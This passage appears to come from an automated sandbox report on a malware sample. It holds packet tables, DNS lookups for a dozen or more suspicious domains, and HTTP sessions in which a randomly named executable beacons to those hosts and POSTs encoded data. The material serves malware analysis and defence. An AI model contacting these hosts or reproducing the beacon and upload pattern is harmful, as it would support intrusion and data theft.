                                                                                                                                                                              Oct 30, 2024 08:13:15.831927061 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:15.831952095 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:15.832005978 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:15.832015038 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:15.832055092 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:15.832065105 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:16.684308052 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:16.688103914 CET5005080192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:17.330832005 CET5005080192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:17.643199921 CET5005080192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:17.651786089 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:17.651830912 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:17.651901960 CET5005080192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:18.350550890 CET5005180192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:18.356198072 CET8050051144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:18.356288910 CET5005180192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:18.366791964 CET5005180192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:18.372363091 CET8050051144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:19.209549904 CET8050051144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:19.252593994 CET5005180192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:19.343592882 CET8050051144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:19.343791008 CET5005180192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:19.347997904 CET5005180192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 30, 2024 08:13:19.353450060 CET8050051144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:24.366348028 CET5005280192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:24.371769905 CET805005234.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:24.371845007 CET5005280192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:24.386512041 CET5005280192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:24.391913891 CET805005234.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:25.346431971 CET805005234.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:25.393989086 CET5005280192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:25.523514032 CET805005234.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:25.523622036 CET5005280192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:25.893584013 CET5005280192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:26.913177967 CET5005380192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:26.919003010 CET805005334.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:26.926057100 CET5005380192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:26.942014933 CET5005380192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:26.947469950 CET805005334.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:28.198921919 CET805005334.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:28.199239969 CET805005334.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:28.199271917 CET805005334.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:28.199290991 CET5005380192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:28.199333906 CET5005380192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:28.456013918 CET5005380192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:29.482276917 CET5005480192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:29.487744093 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:29.487879038 CET5005480192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:29.499329090 CET5005480192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:29.504754066 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:29.504766941 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:29.504786968 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:29.504796982 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:29.504806995 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:29.504885912 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:29.504906893 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:29.504935026 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:29.504944086 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:30.466429949 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:30.545952082 CET5005480192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:30.644228935 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:30.644366026 CET5005480192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:31.006685019 CET5005480192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:32.022988081 CET5005580192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:32.028595924 CET805005534.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:32.028673887 CET5005580192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:32.039005041 CET5005580192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:32.044500113 CET805005534.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:32.998105049 CET805005534.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:33.173841953 CET805005534.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:33.174084902 CET5005580192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:33.175215006 CET5005580192.168.2.434.92.128.59
                                                                                                                                                                              Oct 30, 2024 08:13:33.180586100 CET805005534.92.128.59192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:38.212658882 CET5005680192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:38.218231916 CET8050056152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:38.218506098 CET5005680192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:38.229788065 CET5005680192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:38.235131979 CET8050056152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:39.234744072 CET8050056152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:39.287978888 CET5005680192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:39.446569920 CET8050056152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:39.446757078 CET5005680192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:39.737049103 CET5005680192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:40.775918007 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:40.781389952 CET8050057152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:40.781586885 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:40.799501896 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:40.804965019 CET8050057152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:41.790015936 CET8050057152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:41.851526022 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:41.995016098 CET8050057152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:41.995068073 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:42.315155983 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:43.333878994 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:43.339520931 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.339644909 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:43.354258060 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:43.359803915 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.359853029 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.359951019 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.359985113 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.360013008 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.360039949 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.360066891 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.360116959 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:43.360145092 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:44.345587969 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:44.467456102 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:44.564929008 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:44.565004110 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:44.865087032 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:45.881563902 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:45.887310982 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:45.887428045 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:45.896469116 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:45.901947975 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:46.886544943 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:46.940067053 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:47.090626955 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:47.092147112 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:47.095977068 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 30, 2024 08:13:47.102293968 CET8050059152.42.255.48192.168.2.4

                                                                                                                                                                              UDP Packets

                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Oct 30, 2024 08:10:32.284318924 CET5517853192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:10:32.302987099 CET53551781.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:48.012514114 CET5965153192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:10:49.003021955 CET5965153192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:10:49.027604103 CET53596511.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:49.027617931 CET53596511.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:02.883480072 CET5618953192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:11:02.900844097 CET53561891.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:16.553838015 CET6363953192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:11:16.601387024 CET53636391.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:30.256859064 CET5656853192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:11:30.276035070 CET53565681.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:43.835290909 CET5193153192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:11:43.861886024 CET53519311.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:57.616776943 CET5219653192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:11:57.634108067 CET53521961.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:11.076071024 CET5466453192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:12:12.065435886 CET5466453192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:12:13.084084034 CET5466453192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:12:14.225992918 CET53546641.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:14.226046085 CET53546641.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:14.226094007 CET53546641.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:28.038857937 CET6406153192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:12:29.036067963 CET6406153192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:12:29.581048965 CET53640611.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:29.581088066 CET53640611.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:42.975102901 CET5001353192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:12:43.162647963 CET53500131.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:56.460845947 CET5028253192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:12:56.718436003 CET53502821.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:10.522691011 CET5487453192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:13:10.703067064 CET53548741.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:24.350954056 CET6127553192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:13:24.363662958 CET53612751.1.1.1192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:13:38.194443941 CET5018553192.168.2.41.1.1.1
                                                                                                                                                                              Oct 30, 2024 08:13:38.210107088 CET53501851.1.1.1192.168.2.4

                                                                                                                                                                              DNS Queries

                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Oct 30, 2024 08:10:32.284318924 CET192.168.2.41.1.1.10xff01Standard query (0)www.iampinky.infoA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:10:48.012514114 CET192.168.2.41.1.1.10xf686Standard query (0)www.cotti.clubA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:10:49.003021955 CET192.168.2.41.1.1.10xf686Standard query (0)www.cotti.clubA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:11:02.883480072 CET192.168.2.41.1.1.10x4498Standard query (0)www.solarand.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:11:16.553838015 CET192.168.2.41.1.1.10x3cfbStandard query (0)www.030002059.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:11:30.256859064 CET192.168.2.41.1.1.10xebdfStandard query (0)www.xipowerplay.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:11:43.835290909 CET192.168.2.41.1.1.10x7a52Standard query (0)www.stationseek.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:11:57.616776943 CET192.168.2.41.1.1.10x2f77Standard query (0)www.091210.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:12:11.076071024 CET192.168.2.41.1.1.10x52a6Standard query (0)www.adsa6c.topA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:12:12.065435886 CET192.168.2.41.1.1.10x52a6Standard query (0)www.adsa6c.topA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:12:13.084084034 CET192.168.2.41.1.1.10x52a6Standard query (0)www.adsa6c.topA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:12:28.038857937 CET192.168.2.41.1.1.10x213bStandard query (0)www.simplek.topA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:12:29.036067963 CET192.168.2.41.1.1.10x213bStandard query (0)www.simplek.topA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:12:42.975102901 CET192.168.2.41.1.1.10xaef4Standard query (0)www.297676.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:12:56.460845947 CET192.168.2.41.1.1.10xf3ffStandard query (0)www.cesach.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:13:10.522691011 CET192.168.2.41.1.1.10xbcf5Standard query (0)www.basicreviews.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:13:24.350954056 CET192.168.2.41.1.1.10xb094Standard query (0)www.sgland06.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:13:38.194443941 CET192.168.2.41.1.1.10xb452Standard query (0)www.extrime1.shopA (IP address)IN (0x0001)false

                                                                                                                                                                              DNS Answers

                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Oct 30, 2024 08:10:32.302987099 CET1.1.1.1192.168.2.40xff01No error (0)www.iampinky.infoiampinky.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:10:32.302987099 CET1.1.1.1192.168.2.40xff01No error (0)iampinky.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:10:32.302987099 CET1.1.1.1192.168.2.40xff01No error (0)iampinky.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:10:49.027604103 CET1.1.1.1192.168.2.40xf686No error (0)www.cotti.club103.120.80.111A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:10:49.027617931 CET1.1.1.1192.168.2.40xf686No error (0)www.cotti.club103.120.80.111A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:11:02.900844097 CET1.1.1.1192.168.2.40x4498No error (0)www.solarand.onlinesolarand.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:11:02.900844097 CET1.1.1.1192.168.2.40x4498No error (0)solarand.online217.160.0.60A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:11:16.601387024 CET1.1.1.1192.168.2.40x3cfbNo error (0)www.030002059.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:11:30.276035070 CET1.1.1.1192.168.2.40xebdfNo error (0)www.xipowerplay.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:11:30.276035070 CET1.1.1.1192.168.2.40xebdfNo error (0)www.xipowerplay.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:11:43.861886024 CET1.1.1.1192.168.2.40x7a52No error (0)www.stationseek.onlinestationseek.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:11:43.861886024 CET1.1.1.1192.168.2.40x7a52No error (0)stationseek.online198.251.84.200A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:11:57.634108067 CET1.1.1.1192.168.2.40x2f77No error (0)www.091210.xyz172.67.154.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:11:57.634108067 CET1.1.1.1192.168.2.40x2f77No error (0)www.091210.xyz104.21.48.156A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:12:14.225992918 CET1.1.1.1192.168.2.40x52a6No error (0)www.adsa6c.top20.2.249.7A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:12:14.226046085 CET1.1.1.1192.168.2.40x52a6No error (0)www.adsa6c.top20.2.249.7A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:12:14.226094007 CET1.1.1.1192.168.2.40x52a6No error (0)www.adsa6c.top20.2.249.7A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:12:29.581048965 CET1.1.1.1192.168.2.40x213bNo error (0)www.simplek.top203.161.49.193A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:12:29.581088066 CET1.1.1.1192.168.2.40x213bNo error (0)www.simplek.top203.161.49.193A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:12:43.162647963 CET1.1.1.1192.168.2.40xaef4No error (0)www.297676.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:12:56.718436003 CET1.1.1.1192.168.2.40xf3ffNo error (0)www.cesach.net217.76.156.252A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:13:10.703067064 CET1.1.1.1192.168.2.40xbcf5No error (0)www.basicreviews.onlinebasicreviews.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:13:10.703067064 CET1.1.1.1192.168.2.40xbcf5No error (0)basicreviews.online144.76.190.39A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:13:24.363662958 CET1.1.1.1192.168.2.40xb094No error (0)www.sgland06.online34.92.128.59A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:13:38.210107088 CET1.1.1.1192.168.2.40xb452No error (0)www.extrime1.shopextrime1.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 08:13:38.210107088 CET1.1.1.1192.168.2.40xb452No error (0)extrime1.shop152.42.255.48A (IP address)IN (0x0001)false

                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                              • www.iampinky.info
                                                                                                                                                                              • www.cotti.club
                                                                                                                                                                              • www.solarand.online
                                                                                                                                                                              • www.030002059.xyz
                                                                                                                                                                              • www.xipowerplay.xyz
                                                                                                                                                                              • www.stationseek.online
                                                                                                                                                                              • www.091210.xyz
                                                                                                                                                                              • www.adsa6c.top
                                                                                                                                                                              • www.simplek.top
                                                                                                                                                                              • www.297676.com
                                                                                                                                                                              • www.cesach.net
                                                                                                                                                                              • www.basicreviews.online
                                                                                                                                                                              • www.sgland06.online
                                                                                                                                                                              • www.extrime1.shop

                                                                                                                                                                              HTTP Packets

                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.4497413.33.130.190803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:10:32.326267004 CET446OUTGET /nhtq/?ZT=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.iampinky.info
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:10:32.953885078 CET394INHTTP/1.1 200 OK
                                                                                                                                                                              Server: openresty
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:10:32 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 254
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 54 3d 30 2b 6d 55 36 66 58 34 6d 47 67 48 33 61 49 34 4b 76 6e 5a 30 44 6e 74 39 4e 4e 39 75 68 66 51 34 57 51 4c 6f 4f 39 59 4a 51 71 31 72 4c 6b 69 56 33 6d 57 65 2f 53 68 70 69 57 62 36 47 52 77 4e 38 58 4b 53 48 79 79 50 6c 7a 31 4f 44 43 32 4d 4b 30 76 59 73 78 34 45 7a 64 73 47 30 6a 30 51 65 73 47 42 6e 57 6a 52 76 79 67 42 4f 64 4b 64 6b 43 32 31 6b 34 3d 26 6d 54 6b 44 3d 47 6a 32 54 69 32 54 30 67 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZT=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&mTkD=Gj2Ti2T0g4"}</script></head></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.449794103.120.80.111803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:10:49.047422886 CET704OUTPOST /3ej6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cotti.club
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cotti.club
                                                                                                                                                                              Referer: http://www.cotti.club/3ej6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 4c 64 51 48 35 43 50 32 46 6c 65 53 30 51 58 34 77 58 4e 37 55 65 4b 5a 52 4a 6b 49 41 69 56 75 78 71 64 71 6c 66 57 42 76 66 49 78 41 41 39 41 79 70 45 53 4d 68 77 58 72 57 44 36 64 35 6d 67 6f 79 70 4f 62 33 6b 62 47 5a 75 54 55 47 35 4d 4d 37 43 74 42 68 42 47 49 49 2b 6b 68 30 57 4b 2b 62 78 63 41 30 4c 44 72 2f 68 70 43 42 49 59 41 56 41 73 74 41 68 38 47 66 67 4e 63 78 45 56 7a 44 74 64 39 61 45 72 39 39 61 38 31 68 44 53 74 79 74 5a 31 67 38 7a 35 44 55 5a 6e 77 34 41 6f 32 51 76 50 39 72 4c 4a 58 71 6b 32 64 6f 7a 51 4c 67 67 41 57 49 53 36 34 36 73 78 6c 4c 2f 53 77 3d 3d
